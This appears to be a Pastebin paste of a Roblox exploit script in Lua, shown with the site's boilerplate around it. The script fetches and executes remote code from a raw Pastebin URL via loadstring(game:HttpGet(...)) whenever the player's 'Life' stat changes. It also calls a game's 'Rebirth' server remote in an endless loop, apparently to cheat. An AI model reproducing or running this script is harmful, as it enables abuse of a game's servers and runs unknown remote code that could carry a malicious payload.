Advertisement
Guest User

Untitled

a guest
Mar 24th, 2018
206
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.26 KB | None | 0 0
  1. local player = game.Players.LocalPlayer
  2. player.leaderstats.Life.Changed:connect(function(plr)
  3. delay(4, function()
  4. loadstring(game:HttpGet("https://pastebin.com/raw/ktDmjzXJ", true))()
  5. end)
  6. end)
  7. while wait() do
  8. game.ReplicatedStorage.Rebirth:InvokeServer()
  9. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement